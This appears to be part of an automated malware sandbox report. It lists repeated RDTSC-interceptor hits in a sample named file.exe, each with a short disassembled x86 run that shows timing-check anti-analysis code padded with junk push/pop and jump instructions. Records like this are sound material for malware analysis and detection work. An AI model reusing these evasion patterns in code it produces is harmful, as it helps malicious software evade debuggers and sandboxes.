              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E89B3 second address: 4E89C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E89C0 second address: 4E89D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5AF4D0D7C6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F5AF4D0D7C6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8B1C second address: 4E8B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F5AF5006769h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECE26 second address: 4ECE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECE2A second address: 4ECE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECE36 second address: 4ECE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECE3B second address: 4ECE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECF76 second address: 4ECF82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F5AF4D0D7C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F628E second address: 4F6292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDAFA second address: 4FDAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF27C second address: 4FF287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF287 second address: 4FF28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C1D5 second address: 50C1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C1E0 second address: 50C1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C1E6 second address: 50C1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C1EA second address: 50C209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C209 second address: 50C20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C20D second address: 50C22F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5AF4D0D7D8h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C22F second address: 50C235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C235 second address: 50C245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F5AF4D0D7C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C245 second address: 50C29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006767h 0x00000007 jns 00007F5AF5006756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5AF5006762h 0x00000014 jmp 00007F5AF5006768h 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F5AF5006756h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521F6F second address: 521F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52187C second address: 5218A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5218A0 second address: 5218C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5218C0 second address: 5218C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5218C7 second address: 5218DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D2h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260AE second address: 5260B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260B4 second address: 52612F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1B76h], edi 0x00000012 push 00000004h 0x00000014 push ebx 0x00000015 mov edx, edi 0x00000017 pop edx 0x00000018 sbb dx, 1BA9h 0x0000001d call 00007F5AF4D0D7C9h 0x00000022 push ecx 0x00000023 jmp 00007F5AF4D0D7D4h 0x00000028 pop ecx 0x00000029 push eax 0x0000002a jmp 00007F5AF4D0D7D7h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 jmp 00007F5AF4D0D7CAh 0x00000038 mov eax, dword ptr [eax] 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007F5AF4D0D7C8h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52612F second address: 526157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 js 00007F5AF5006756h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526157 second address: 52615C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5263B8 second address: 5263BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5263BC second address: 5263C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5263C2 second address: 5263D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006761h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5277B5 second address: 5277D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7D9h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520036A second address: 520036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520036E second address: 520038A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520038A second address: 520039C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520039C second address: 52003AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52003AA second address: 5200401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov ch, F5h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 push esi 0x00000012 mov dl, C1h 0x00000014 pop eax 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F5AF5006761h 0x00000020 pushfd 0x00000021 jmp 00007F5AF5006760h 0x00000026 jmp 00007F5AF5006765h 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5200459 second address: 5200469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5200469 second address: 520046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230589 second address: 523058D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523058D second address: 52305E3 instructions: 0x00000000 rdtsc 0x00000002 mov dx, E250h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5AF500675Bh 0x00000013 or ecx, 621261FEh 0x00000019 jmp 00007F5AF5006769h 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 call 00007F5AF500675Ch 0x00000027 push eax 0x00000028 pop ebx 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov esi, ebx 0x00000031 mov cx, di 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52305E3 second address: 52305FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7D3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52305FA second address: 52305FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52305FE second address: 5230662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5AF4D0D7CBh 0x00000012 sbb cl, 0000001Eh 0x00000015 jmp 00007F5AF4D0D7D9h 0x0000001a popfd 0x0000001b call 00007F5AF4D0D7D0h 0x00000020 mov ax, 7271h 0x00000024 pop ecx 0x00000025 popad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5AF4D0D7D4h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230662 second address: 5230671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230671 second address: 5230693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f jmp 00007F5AF4D0D7CAh 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230693 second address: 52306B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52306B0 second address: 5230746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5AF4D0D7D7h 0x00000009 and ch, FFFFFFFEh 0x0000000c jmp 00007F5AF4D0D7D9h 0x00000011 popfd 0x00000012 mov esi, 0B812547h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b pushad 0x0000001c mov dx, si 0x0000001f mov ecx, 3987375Bh 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov bx, F8C2h 0x0000002b pushfd 0x0000002c jmp 00007F5AF4D0D7D3h 0x00000031 or eax, 57CC27BEh 0x00000037 jmp 00007F5AF4D0D7D9h 0x0000003c popfd 0x0000003d popad 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5AF4D0D7CDh 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230746 second address: 5230756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230756 second address: 523075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52307D3 second address: 52307D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52307D7 second address: 52307DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52307DD second address: 52307E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52307E3 second address: 5230803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5AF4D0D843h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5AF4D0D7CEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230803 second address: 5230807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230807 second address: 523080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523088A second address: 5230890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230890 second address: 52308BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AF4D0D7D7h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52308BC second address: 52308E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AF500675Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52308E9 second address: 523003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5AF4D0D7D7h 0x00000008 pop esi 0x00000009 mov si, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f retn 0004h 0x00000012 nop 0x00000013 sub esp, 04h 0x00000016 xor ebx, ebx 0x00000018 cmp eax, 00000000h 0x0000001b je 00007F5AF4D0D915h 0x00000021 xor eax, eax 0x00000023 mov dword ptr [esp], 00000000h 0x0000002a mov dword ptr [esp+04h], 00000000h 0x00000032 call 00007F5AF9CC931Bh 0x00000037 mov edi, edi 0x00000039 pushad 0x0000003a push ecx 0x0000003b mov si, di 0x0000003e pop edi 0x0000003f mov dx, si 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 jmp 00007F5AF4D0D7D0h 0x00000049 push eax 0x0000004a jmp 00007F5AF4D0D7CBh 0x0000004f xchg eax, ebp 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F5AF4D0D7D0h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523003E second address: 5230042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230042 second address: 5230048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230048 second address: 523006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5AF500675Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523006A second address: 5230070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230070 second address: 5230081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF500675Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230081 second address: 523010B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a pushad 0x0000000b jmp 00007F5AF4D0D7D3h 0x00000010 pushfd 0x00000011 jmp 00007F5AF4D0D7D8h 0x00000016 and eax, 410F7838h 0x0000001c jmp 00007F5AF4D0D7CBh 0x00000021 popfd 0x00000022 popad 0x00000023 push 61E78DFFh 0x00000028 jmp 00007F5AF4D0D7CFh 0x0000002d add dword ptr [esp], 13DF1049h 0x00000034 jmp 00007F5AF4D0D7D6h 0x00000039 call 00007F5AF4D0D7C9h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523010B second address: 5230111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230111 second address: 5230120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7CBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230120 second address: 5230183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5AF5006761h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F5AF5006761h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F5AF5006766h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230183 second address: 5230189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230189 second address: 523018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523018D second address: 523028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5AF4D0D7D1h 0x00000016 sub ecx, 5FD18DB6h 0x0000001c jmp 00007F5AF4D0D7D1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F5AF4D0D7D0h 0x00000028 jmp 00007F5AF4D0D7D5h 0x0000002d popfd 0x0000002e popad 0x0000002f pop eax 0x00000030 jmp 00007F5AF4D0D7CEh 0x00000035 mov eax, dword ptr fs:[00000000h] 0x0000003b jmp 00007F5AF4D0D7D0h 0x00000040 nop 0x00000041 jmp 00007F5AF4D0D7D0h 0x00000046 push eax 0x00000047 jmp 00007F5AF4D0D7CBh 0x0000004c nop 0x0000004d jmp 00007F5AF4D0D7D6h 0x00000052 sub esp, 18h 0x00000055 jmp 00007F5AF4D0D7D0h 0x0000005a xchg eax, ebx 0x0000005b jmp 00007F5AF4D0D7D0h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jmp 00007F5AF4D0D7D8h 0x00000069 popad 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523028E second address: 52302A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 44h 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c mov cx, 4201h 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bl, ah 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302A7 second address: 52302CA instructions: 0x00000000 rdtsc 0x00000002 mov edi, 0C27C4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov esi, 56F000EBh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5AF4D0D7CEh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302CA second address: 52302E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5AF5006763h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302E7 second address: 523030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523030B second address: 523030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523030F second address: 5230315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230315 second address: 523031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
